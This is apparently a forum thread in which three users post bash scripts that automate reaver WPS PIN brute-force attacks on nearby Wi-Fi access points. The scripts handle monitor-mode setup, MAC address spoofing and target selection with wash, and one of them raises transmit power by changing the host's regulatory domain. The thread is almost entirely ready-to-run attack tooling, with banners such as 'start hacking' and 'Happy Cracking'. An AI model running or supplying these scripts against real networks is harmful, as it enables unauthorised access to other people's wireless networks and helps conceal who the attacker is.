j0k3rr1
Código:
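#!/bin/bash
# Interactive wrapper around the aircrack-ng / reaver tool chain, written by
# j0k3rr and tested on BackTrack 5 KDE (it opens extra windows with konsole).
# Save it as <filename>.sh, then chmod +x <filename>.sh and run ./<filename>.sh
#
# Flow: ask for the wireless interface, optionally raise TX power and set a
# fixed MAC address, start monitor mode, list WPS-enabled access points with
# wash, then start reaver against the BSSID and channel typed at the prompt.
#
# Every value typed at a prompt is matched against a strict pattern before it
# is handed to a command, and every expansion is quoted. Without that, a typo,
# an embedded space or a value starting with "-" would be split into extra
# words and read by iwconfig/ifconfig/macchanger/reaver as additional options.

# Linux interface names: at most 15 characters, never starting with "-".
iface_re='^[A-Za-z0-9][A-Za-z0-9_.:-]{0,14}$'
# Six colon-separated hex octets.
bssid_re='^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
# Channel number, digits only.
channel_re='^[0-9]{1,3}$'

# Restore the terminal colour, print a message on stderr and stop.
die() {
  tput sgr0
  printf '%s\n' "$*" >&2
  exit 1
}

# ask VAR REGEX PROMPT
# Prompt until the answer matches REGEX, then store it in the variable VAR.
ask() {
  local reply
  while :; do
    read -r -p "$3" reply || die "Input closed, stopping"
    if [[ $reply =~ $2 ]]; then
      printf -v "$1" '%s' "$reply"
      return 0
    fi
    echo "Not a valid value, try again"
  done
}

# Banner
clear
tput setaf 2
echo "##################################################################################"
echo "# ~Automate reaver WPS attack Bash script written by j0k3rr~ #"
echo "# 1-Tested on Backtrack 5 KDE #"
echo "# 2-Make sure your wifi card is plugged in before starting the script #"
echo "# 3-Any problems with the script feel free to contact me on twitter @j0k3rr1 #"
echo "# #"
echo "# #"
echo "# #"
echo "##################################################################################"
tput setaf 1
read -r -p "Press [Enter] to start hacking..." _
clear

# Show the candidate interfaces, then ask which one to use (wlan0, wlan1, ...)
tput setaf 1
ifconfig | grep "wlan"
tput setaf 2
ask winterface "$iface_re" "Whats your Wireless interface? (Should be listed in red above) "

# Optional: raise TX power to 30 dBm. An empty answer counts as yes.
tput setaf 2
echo "Would you like to increase the TX Power of your wireless card to 30 dBm? Y/n"
read -r a
if [[ $a == "Y" || $a == "y" || -z $a ]]; then
  # "iw reg set" changes the regulatory domain for the whole host, not just
  # this interface, and nothing in this script sets it back afterwards.
  iw reg set BO
  iwconfig "$winterface" txpower 30
else
  echo "continuing without changing the TX power"
fi

# Optional: set a fixed MAC address, then put the card into monitor mode.
tput setaf 2
echo "Would you like to spoof the MAC address of your wifi card? Y/n"
read -r b
if [[ $b == "Y" || $b == "y" || -z $b ]]; then
  # The hardware address is not restored by this script.
  wmac=00:11:22:33:44:55
  airmon-ng stop "$winterface"
  ifconfig "$winterface" down
  macchanger --mac "$wmac" "$winterface"
  ifconfig "$winterface" up
else
  tput setaf 1
  echo "continuing without changing the mac address"
fi
tput setaf 1
airmon-ng start "$winterface"

tput setaf 2
ask minterface "$iface_re" "Whats the monitor mode interface? (Usually mon0) "

# List WPS-enabled access points in a separate konsole window.
clear
tput setaf 1
echo "About to start monitoring the air! "
sleep 3
konsole --hold -e wash -i "$minterface"
sleep 5

# Ask for the access point's BSSID and channel.
tput setaf 2
echo "Input the WPS enabled access points details: "
tput setaf 1
ask xBSSID "$bssid_re" "BSSID: "
ask xCH "$channel_re" "Channel number: "

# Run reaver in its own window; both values were validated above.
konsole --hold -e reaver -i "$minterface" -c "$xCH" -b "$xBSSID" -vv &

# End
clear
tput setaf 2
echo "[+] Process Started:"
echo "[+] Attacking " "$xBSSID" "on channel " "$xCH" " Goodluck and Happy Cracking"
wait
# Leave the terminal in its default colour.
tput sgr0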
Hackling
Código:
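#!/bin/bash
#Interactive front end for a reaver session: optionally creates a monitor
#interface with airmon-ng, randomises its MAC with macchanger, lists
#WPS-enabled access points with wash, then runs reaver against the BSSID
#typed at the prompt. If this script started monitor mode it also stops it
#again, on every exit path.
#
#Interface names and the BSSID are matched against a strict pattern before
#they reach any command and every expansion is quoted, so a typo or a value
#beginning with "-" cannot be read as an extra option by the tools below.

#Linux interface names: at most 15 characters, never starting with "-"
iface_re='^[A-Za-z0-9][A-Za-z0-9_.:-]{0,14}$'
#Six colon-separated hex octets
bssid_re='^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'

setup=''
monInterface=''

die() {
  printf '%s\n' "$*" >&2
  exit 1
}

#read_checked VAR REGEX DEFAULT
#Read one line, fall back to DEFAULT when it is empty, and repeat until the
#value matches REGEX; the result is stored in the variable named VAR.
read_checked() {
  local value
  while :; do
    read -r value || die "[!] Input closed, stopping"
    value=${value:-$3}
    if [[ $value =~ $2 ]]; then
      printf -v "$1" '%s' "$value"
      return 0
    fi
    echo "[!] Not a valid value, try again"
  done
}

#Stop Monitor Mode Interface if the script set it up
teardown() {
  if [[ $setup == 'y' && -n $monInterface ]]; then
    echo ""
    echo "[+] killing Monitor Interface"
    airmon-ng stop "$monInterface"
  fi
}
trap teardown EXIT

clear
echo "This script makes it easy to start a reaver attack"
echo ""
echo "[+] Do you need to setup a monitor interface? [y/n]"
read -r setup
if [[ $setup == 'y' ]]; then
  #Setup the monitor interface
  echo "[+] What Wireless interfaces do we have..."
  iwconfig
  echo "[+] Please select an interface to place into Monitor Mode [wlan0]"
  read_checked interface "$iface_re" wlan0 #Default to wlan0
  echo "[+] Starting monitor Mode for $interface"
  airmon-ng start "$interface"
  iwconfig
fi #End Mon Mode Setup Portion

#Start part of script that executes regardless
echo "[+] What monitor interface should I use? [mon0]"
read_checked monInterface "$iface_re" mon0 #Default to mon0

#Spoof the Mon Mac
echo "[+] MacSpoofing $monInterface"
ifconfig "$monInterface" down
macchanger -r "$monInterface"
ifconfig "$monInterface" up

#Check for Targets
echo ""
echo "[+] ------------------------------------------------------[+]"
echo "[+] Checking for WPS enabled APs press (ctrl+c) when done [+]"
echo "[+] ------------------------------------------------------[+]"
wash -i "$monInterface"

#Set Reaver Target
echo "[+] What is the MAC for the target AP?"
read_checked target "$bssid_re" ''

#Set optional functions
reaver #to show the options available in terminal
echo "[+] reaver -i $monInterface -b $target"
echo "[+] Type any other reaver options you'd like besides the above"
#Read the extra options into an array: they are still split on whitespace,
#but are no longer glob-expanded against the current directory.
read -r -a reaverVars

#Start reaver
echo "[+] Starting reaver (reaver -i $monInterface -b $target ${reaverVars[*]})"
reaver -i "$monInterface" -b "$target" "${reaverVars[@]}"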
Vinay Gopinath
Código:
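#! /bin/bash
#WiFi Attack Script, v1.0
#Author: Vinay Gopinath
#Date: 26 October, 2012
#
#Restarts monitor mode on the configured wireless interface, lets wash
#collect WPS-enabled access points for a fixed time, lets the operator pick
#one (or takes the first), then runs reaver against it on mon0.
#
#Everything wash reports (ESSID, BSSID, channel) is taken from frames sent by
#nearby devices, and this script runs as root, so the scan is handled as
#untrusted input: rows are kept in arrays and selected by index, BSSID and
#channel must match a strict pattern, ESSIDs are only displayed (with
#non-printable characters replaced), and nothing from the scan is used as a
#regex, a glob or an unquoted word.

#CONFIG: Customize the script according to your needs
#The default wireless interface (usually wlan0, wifi0 or ath0)
wireless_interface=wlan0
#The timeout (in seconds) for wash to search for WPS-enabled access points
wash_timeout=15
#Flag to allow user to choose target AP
allow_user_choice=1
#Delay between attack attempts
reaver_delay=0

#Accepted shapes for the two scan fields that are passed on to reaver
bssid_re='^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
channel_re='^[0-9]{1,3}$'

#Check for root privileges
if (( EUID != 0 )); then
  echo "This script needs root"
  exit 1
fi

#Check for required commands
for tool in airmon-ng wash reaver
do
  if ! command -v "$tool" > /dev/null 2>&1; then
    echo "$tool was not found"
    echo "To install $tool, you may follow this link"
    echo "http://lmgtfy.com/?q=$tool+installation"
    exit 1
  fi
done

echo "WARNING: Network connections are about to go down. You may need to re-enable wireless connections manually"

#Check available interfaces and close previous monitor interfaces and wireless lan.
#Names are read on fd 3 so that airmon-ng keeps the terminal as its stdin.
#The test is "starts with mon, or ends in 0, and is not eth0".
while read -r interface <&3
do
  if [[ $interface == mon* || $interface == *0 ]] && [[ $interface != "eth0" ]]; then
    echo "* Shutting down $interface"
    airmon-ng stop "$interface" > /dev/null
  fi
done 3< <(ifconfig | awk '/^[^[:space:]]/ { print $1 }')

echo "* Starting a new monitor interface mon0"
airmon-ng start "$wireless_interface" > /dev/null

#Scan results go to a private temporary file instead of a fixed name in the
#current directory (which a root process would follow through a symlink);
#the trap removes it on every exit path.
wash_output=$(mktemp) || { echo "Could not create a temporary file"; exit 1; }
trap 'rm -f -- "$wash_output"' EXIT

echo "Identifying WPS-enabled access points"
timeout "$wash_timeout" wash -i mon0 --ignore-fcs > "$wash_output"

#Parse the scan: skip the two header lines, take field 1 as BSSID, field 2 as
#channel and field 6 as ESSID. Rows that do not look like an access point
#entry are dropped.
ap_macs=()
ap_channels=()
ap_names=()
while read -r bssid ch _ _ _ essid _
do
  [[ $bssid =~ $bssid_re && $ch =~ $channel_re && -n $essid ]] || continue
  ap_macs+=("$bssid")
  ap_channels+=("$ch")
  #Replace non-printable bytes so an ESSID cannot send escape sequences to
  #the terminal when it is echoed.
  ap_names+=("${essid//[![:print:]]/?}")
done < <(tail -n +3 -- "$wash_output")

count=${#ap_macs[@]}
if (( count > 0 )); then
  if (( allow_user_choice )); then
    echo "The following access points were detected"
    for (( i = 0; i < count; i++ ))
    do
      echo "* $((i + 1)): ${ap_names[i]}"
    done
    read -r -p "Enter your choice: " choice
    #Digits only, then a range check. The answer is never handed to an
    #arithmetic context unvalidated, because bash evaluates such operands
    #as expressions.
    if [[ $choice =~ ^[0-9]{1,4}$ ]] && (( 10#$choice >= 1 && 10#$choice <= count )); then
      index=$(( 10#$choice - 1 ))
      echo "You have chosen ${ap_names[index]}"
    else
      echo "Invalid choice!"
      exit 1
    fi
  else
    index=0
    echo "Proceeding with choice 1: ${ap_names[0]}"
  fi

  #Take channel and BSSID from the selected row itself rather than searching
  #the scan again by ESSID, which is ambiguous when two rows share a name.
  chosen_ap=${ap_names[index]}
  channel=${ap_channels[index]}
  mac_address=${ap_macs[index]}

  echo "Starting reaver"
  echo "reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay"
  echo "AP name: $chosen_ap"
  echo "Channel: $channel"
  echo "MAC Address: $mac_address"
  reaver -a -S -vv -c "$channel" -i mon0 -b "$mac_address" -d "$reaver_delay"
else
  echo "No networks found. Consider increasing the wash timeout. Terminating"
  exit 1
fi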